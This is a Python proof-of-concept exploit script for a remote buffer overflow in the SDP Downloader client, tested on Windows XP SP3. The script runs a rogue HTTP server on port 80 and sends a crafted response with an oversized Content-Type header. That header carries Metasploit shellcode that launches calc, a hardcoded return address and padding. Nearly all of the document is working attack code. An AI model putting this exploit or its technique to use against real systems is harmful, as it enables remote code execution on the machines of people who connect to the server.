#!/usr/bin/python
#Bug : SDP Downloader (http_response) Remote Buffer Overflow Exploit
# by: sup3r
#Tested on : Xp sp3
#http://sdp.ppona.com/

from socket import *

# win32_exec -  EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
"\xf3\x2a\x67\x83\xeb\xfc\xe2\xf4\x8d\x1b\x6e\x67\x71\xf3\xa1\x22"
"\x4d\x78\x56\x62\x09\xf2\xc5\xec\x3e\xeb\xa1\x38\x51\xf2\xc1\x2e"
"\xfa\xc7\xa1\x66\x9f\xc2\xea\xfe\xdd\x77\xea\x13\x76\x32\xe0\x6a"
"\x70\x31\xc1\x93\x4a\xa7\x0e\x63\x04\x16\xa1\x38\x55\xf2\xc1\x01"
"\xfa\xff\x61\xec\x2e\xef\x2b\x8c\xfa\xef\xa1\x66\x9a\x7a\x76\x43"
"\x75\x30\x1b\xa7\x15\x78\x6a\x57\xf4\x33\x52\x6b\xfa\xb3\x26\xec"
"\x01\xef\x87\xec\x19\xfb\xc1\x6e\xfa\x73\x9a\x67\x71\xf3\xa1\x0f"
"\x4d\xac\x1b\x91\x11\xa5\xa3\x9f\xf2\x33\x51\x37\x19\x8d\xf2\x85"
"\x02\x9b\xb2\x99\xfb\xfd\x7d\x98\x96\x90\x4b\x0b\x12\xf3\x2a\x67")

buffer =  '\x41'*4
buffer += shellcode
buffer += '\x41'*(65584-len(shellcode))
buffer += '\xF0\xF1\xAB\x00' 
#00ABF1F0(shellcode address)
buffer += '\x41'*36
buffer += '\xBC\xEB\x12\x00' 
#0012EBBC Stack section (writable)
buffer += '\x43'*9000

header=(
"HTTP/1.1 200 OK\r\n"
"Content-Type: video/"+buffer+"\r\n"
"Last-Modified: 20 Mar 2010 09:50:10 GMT\r\n"
"Accept-Ranges: bytes\r\n"
"ETag: \"075a1fc3d4dc41:0\"\r\n"
"Server: Microsoft-IIS/7.5\r\n"
"X-Powered-By: ASP.NET\r\n"
"Date: Sat, 20 Mar 2010 14:31:46 GMT\r\n"
"Connection: close\r\n"
"Content-Length: 324\r\n\r\n")

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on [HTTP] 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(header)
c.send(header)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()